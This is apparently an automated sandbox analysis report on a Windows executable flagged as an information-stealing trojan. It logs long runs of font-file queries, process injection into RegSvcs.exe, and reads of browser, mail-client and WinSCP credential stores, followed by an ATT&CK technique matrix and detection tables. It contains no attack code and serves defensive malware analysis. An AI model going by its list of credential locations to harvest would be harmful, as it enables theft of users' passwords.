            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E9F120 GetUserNameW,

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

            Remote Access Functionality

            Source: Yara match | File source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 311 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Web Service | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | 14 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 114 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Source | Detection | Scanner | Label | Link
            g0PWOnCNZH.exe | 43% | Virustotal | | Browse
            g0PWOnCNZH.exe | 26% | ReversingLabs | Win32.Trojan.Generic |
            g0PWOnCNZH.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link | Download
            1.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://www.sajatypeworks.comiv | 0% | URL Reputation | safe |
            http://www.sajatypeworks.com2 | 0% | URL Reputation | safe |
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
            http://www.tiro.com | 0% | URL Reputation | safe |
            http://www.goodfont.co.kr | 0% | URL Reputation | safe |
            http://www.carterandcone.com | 0% | URL Reputation | safe |
            http://www.fontbureau.coml1 | 0% | URL Reputation | safe |
            http://www.founder.com.cn/cnD | 0% | URL Reputation | safe |
            http://www.sajatypeworks.com | 0% | URL Reputation | safe |
            http://www.typography.netD | 0% | URL Reputation | safe |
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
            http://fontfabrik.com | 0% | URL Reputation | safe |
            https://api.telegram.org4 | 0% | URL Reputation | safe |
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
            http://www.fontbureau.comgrito | 0% | URL Reputation | safe |
            http://www.sandoll.co.kr | 0% | URL Reputation | safe |
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
            http://www.sakkal.com | 0% | URL Reputation | safe |
            http://www.sajatypeworks.comTF | 0% | URL Reputation | safe |
            http://www.carterandcone.comTC | 0% | URL Reputation | safe |
            http://www.carterandcone.coml | 0% | URL Reputation | safe |
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
            http://www.monotype. | 0% | URL Reputation | safe |
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
            http://www.tiro.com( | 0% | Avira URL Cloud | safe |
            http://www.fontbureau.como | 0% | URL Reputation | safe |
            http://www.fontbureau.como | 0% | URL Reputation | safe |
            http://www.monotype.U | 0% | Avira URL Cloud | safe |
